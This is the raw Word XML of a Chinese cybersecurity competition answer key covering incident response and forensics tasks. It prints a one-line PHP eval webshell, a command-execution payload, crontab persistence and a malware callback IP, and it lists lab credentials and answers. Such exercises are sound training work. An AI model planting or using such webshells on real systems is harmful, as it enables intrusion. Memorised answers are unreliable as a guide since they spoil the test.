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167" w:rsidRDefault="00561704" w:rsidP="00DC3167">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="44"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc131456808"/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>参考答案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:beforeLines="50" w:before="120" w:afterLines="50" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="44"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc20688296"/>
      <w:bookmarkStart w:id="2" w:name="_Toc131456809"/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>第一部分</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="44"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r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>网络安全事件响应</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/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3" w:name="_Toc35212740"/>
      <w:bookmarkStart w:id="4" w:name="_Toc131456810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任务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1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bookmarkEnd w:id="3"/>
      <w:r w:rsidR="004E4455" w:rsidRPr="004E4455"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CentOS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服务器应急响应</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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（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70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分）</w:t>
      </w:r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A集团的</w:t>
      </w:r>
      <w:r w:rsidR="00FE3BE1">
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w: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服务器被黑客入侵，该服务器的Web应用系统被上传恶意软件，系统文件被恶意软件破坏，您的团队需要帮助该公司追踪此网络攻击的来源，在服务器上进行全面的检查，包括日志信息、进程信息、系统文件、恶意文件等，从而分析黑客的攻击行为，发现系统中的漏洞，并对发现的漏洞进行修复。</w:t>
      </w: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hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc131456811"/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本任务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素材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清单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bookmarkStart w:id="6" w:name="_Toc20688297"/>
      <w:r w:rsidR="004E4455" w:rsidRPr="004E4455"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CentOS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服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务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器虚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拟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机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。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/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受攻击的Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器已整体打包成虚拟机文件保存</w:t>
      </w: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，请选手自行导入分析。</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA01C2"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用户名：root，密码：nanyidian..</w:t>
      </w:r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注意：Server服务器的基本配置参见附录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w: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若题目中未明确规定，请使用默认配置。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/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请按要求完成该部分的工作任务。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9831" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="816"/>
        <w:gridCol w:w="4424"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00AD2BA7">
        <w:trPr>
          <w:trHeight w:val="227"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9831" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D8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Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="7" w:name="_Toc22914441"/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任务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：</w:t>
            </w:r>
            <w:bookmarkEnd w:id="7"/>
            <w:r w:rsidR="004E4455" w:rsidRPr="004E4455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CentOS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服务器应急响应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4424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任务内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591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答案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24" w:type="dxa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请提交网站管理员的用户名和密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591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manage</w:t>
            </w:r>
            <w:r w:rsidR="00470260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r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1</w:t>
            </w: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/863211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424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攻击者通过应用后台修改了某文件获取了服务器权限，请提交该文件的文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591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footer.php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424" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC3167" w:rsidRPr="00616167" w:rsidRDefault="00DC3167" w:rsidP="009342B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攻击者通过篡改文件后，可通过该网站官网进行任意未授权命令执行，请</w:t>
            </w:r>
            <w:r w:rsidR="009342B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提交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利用该木马执行phpinfo的payload,例如</w:t>
            </w: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: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/shell.php?cmd=phpinfo();</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591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/?pass=phpinfo();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424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攻击者进一步留下的免杀的webshell在网站中，请提交该shell的</w:t>
            </w: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原文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最简式，例如：</w:t>
            </w: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 xml:space="preserve"> &lt;?php ...?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591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&lt;?php eval($_POST['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love</w:t>
            </w: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U']);?&gt;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424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攻击者修改了某文件，导致webshell删除后会自动生成，请提交该文件的绝对路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591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/etc/crontab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424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提交网站服务连接数据库使用的数据库账号和密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591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wordpress/wordpress-pass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424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请提交攻击者在数据库中留下</w:t>
            </w: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的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信息，格式为：flag{</w:t>
            </w:r>
            <w:r w:rsidRPr="00616167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...</w:t>
            </w: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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC3167" w:rsidRPr="00616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616167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flag{th1s_ls_fl44444g1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="293" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="590" w:hanging="605"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="44"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc131456812"/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>第二部分</w:t>
      </w:r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 xml:space="preserve"> </w:t>
      </w:r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>数字取证调查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/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9" w:name="_Toc131456813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任务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2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 xml:space="preserve"> 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基于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Windows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的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内存取证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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（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40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分）</w:t>
      </w:r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A集团某服务器系统感染恶意程序，导致系统关键文件被破坏，请分析A集团提供的系统镜像和内存镜像，找到系统镜像中的恶意软件，分析恶意软件行为。</w:t>
      </w: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hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc131456814"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>素材</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>清单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：内存镜像（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*.raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请按要求完成该部分的工作任务。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9831" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="816"/>
        <w:gridCol w:w="4472"/>
        <w:gridCol w:w="4543"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00AD2BA7">
        <w:trPr>
          <w:trHeight w:val="227"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9831" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D8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任务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：</w:t>
            </w:r>
            <w:r w:rsidR="004E4455" w:rsidRPr="004E4455"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基于</w:t>
            </w:r>
            <w:r w:rsidR="004E4455" w:rsidRPr="004E4455"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Windows</w:t>
            </w:r>
            <w:r w:rsidR="004E4455" w:rsidRPr="004E4455"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的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内存取证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4472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任务内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543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答案</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD2BA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AD2BA7" w:rsidRDefault="00AD2BA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472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7530D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请指出内存中疑似恶意进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543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7530D4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.hack.ex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD2BA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AD2BA7" w:rsidRDefault="00AD2BA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472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请指出该</w:t>
            </w:r>
            <w:r w:rsidRPr="007530D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员工使用的公司OA平台的密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543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7530D4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liuling7541</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD2BA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AD2BA7" w:rsidRDefault="00AD2BA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472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7530D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黑客传入一个木马文件并做了权限维持，</w:t>
            </w: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请问</w:t>
            </w:r>
            <w:r w:rsidRPr="007530D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木马文件名是什么</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543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7530D4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h4ck3d!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD2BA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AD2BA7" w:rsidRDefault="00AD2BA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472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请提交该</w:t>
            </w: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计算机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中</w:t>
            </w:r>
            <w:r w:rsidRPr="007530D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记录的重要联系人</w:t>
            </w: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的</w:t>
            </w:r>
            <w:r w:rsidRPr="007530D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家庭住址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4543" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AD2BA7" w:rsidRDefault="00AD2BA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7530D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秋水省雁荡市碧波区千屿山庄1号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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11" w:name="_Toc131456815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任务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3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：通信数据分析取证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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（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50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分）</w:t>
      </w:r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A集团的网络安全监控系统发现恶意份子正在实施高级可持续攻击（APT），并抓取了部分可疑流量包。请您根据捕捉到的流量包，搜寻出网络攻击线索，分解出隐藏的恶意程序，并分析恶意程序的行为。</w:t>
      </w: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hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc131456816"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>素材</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>清单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：捕获的通信数据文件。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/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请按要求完成该部分的工作任务。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9831" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="816"/>
        <w:gridCol w:w="4566"/>
        <w:gridCol w:w="4449"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00AD2BA7">
        <w:trPr>
          <w:trHeight w:val="227"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9831" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="004E44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任务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：通信数据分析取证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00FC1BB5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456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任务内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4449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答案</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000462ED" w:rsidTr="00FC1BB5">
        <w:trPr>
          <w:trHeight w:val="510"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRDefault="000462ED" w:rsidP="000462ED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566" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRPr="000462ED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0462ED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请提交网络数据包中传输的可执行的恶意程序文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4449" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRPr="00FC1BB5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FC1BB5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happy.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000462ED" w:rsidTr="00FC1BB5">
        <w:trPr>
          <w:trHeight w:val="510"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRDefault="000462ED" w:rsidP="000462ED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566" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRPr="000462ED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0462ED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请提交该恶意程序下载载荷的ip和端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4449" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRPr="00FC1BB5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FC1BB5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1</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC1BB5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0.78.128.154</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC1BB5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:</w:t>
            </w:r>
            <w:r w:rsidR="00A14873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909</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC1BB5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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000462ED" w:rsidTr="00FC1BB5">
        <w:trPr>
          <w:trHeight w:val="510"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRDefault="000462ED" w:rsidP="000462ED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566" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRPr="000462ED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0462ED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请提交恶意程序载荷读取的本地文件名（含路径）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4449" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRPr="00FC1BB5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FC1BB5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c:\tmp\</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC1BB5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s</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC1BB5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ecret.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000462ED" w:rsidTr="00FC1BB5">
        <w:trPr>
          <w:trHeight w:val="510"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRDefault="000462ED" w:rsidP="000462ED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4566" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRPr="000462ED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0462ED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请提交恶意程序读取的本地文件的内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4449" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="000462ED" w:rsidRPr="00FC1BB5" w:rsidRDefault="000462ED" w:rsidP="000462ED">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="both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FC1BB5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f6dff95c2ec911ebbede0cdd24f6bd6d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC3167" w:rsidRDefault="00DC3167" w:rsidP="00DC3167">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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13" w:name="_Toc131456817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任务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4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基于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Linux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计算机单机取证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13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（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60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分）</w:t>
      </w:r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对给定取证镜像文件进行分析，搜寻证据关键字（线索关键字为“evidence 1”、“evidence 2”、……、“evidence 10”，有文本形式也有图片形式，不区分大小写），请提取和固定比赛要求的标的证据文件，并按样例的格式要求填写相关信息，证据文件在总文件数中所占比例不低于15%。取证的信息可能隐藏在正常的、已删除的或受损的文件中，您可能需要运用编码转换技术、加解密技术、隐写技术、数据恢复技术，还需要熟悉常用的文件格式（如办公文档、压缩文档、图片等）。</w:t>
      </w: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14" w:name="_Toc131456818"/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本任务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素材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清单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：取证镜像文件。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/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请按要求完成该部分的工作任务。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9831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2600"/>
        <w:gridCol w:w="5393"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00AD2BA7">
        <w:trPr>
          <w:trHeight w:val="227"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9831" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D8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任务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4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：</w:t>
            </w:r>
            <w:r w:rsidR="004E4455" w:rsidRPr="004E4455"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基于</w:t>
            </w:r>
            <w:r w:rsidR="004E4455" w:rsidRPr="004E4455"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Linux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计算机单机取证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC3167" w:rsidTr="00AD2BA7">
        <w:trPr>
          <w:trHeight w:val="439"/>
          <w:jc w:val="center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证据编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2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在取证镜像中的文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5393" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2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镜像中原文件Hash码（MD5，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不区分大小写</w:t>
            </w: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）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evidence 1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lili</w:t>
            </w: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.gif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900EA4D6698613298AEDE3DF36BA92B8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qwe.dll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FB99F9C2C207281E0CD7A29E976F1CDD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dudu.xlsx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2437FD58491FBCA528B49B4AC7089425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vbdg.docx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6B8DFFA9586C6D99B559C79A2105D855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four_Digit.jpg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509998568BEAFA5D6C950493220F783D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jiko.py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68BB1999633DBB422C164AA4F664897B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INbud.bmp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9CEADE34EB17E135E24CB7937A600ADC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0N0</w:t>
            </w:r>
            <w:r w:rsidRPr="00D900AF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n</w:t>
            </w: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.jpg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45EB5309A774F1DB0B3B996584EB4326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 xml:space="preserve">evidence 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buhu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900AA268F3BF119233CB2F05D5B8FAFD</w:t>
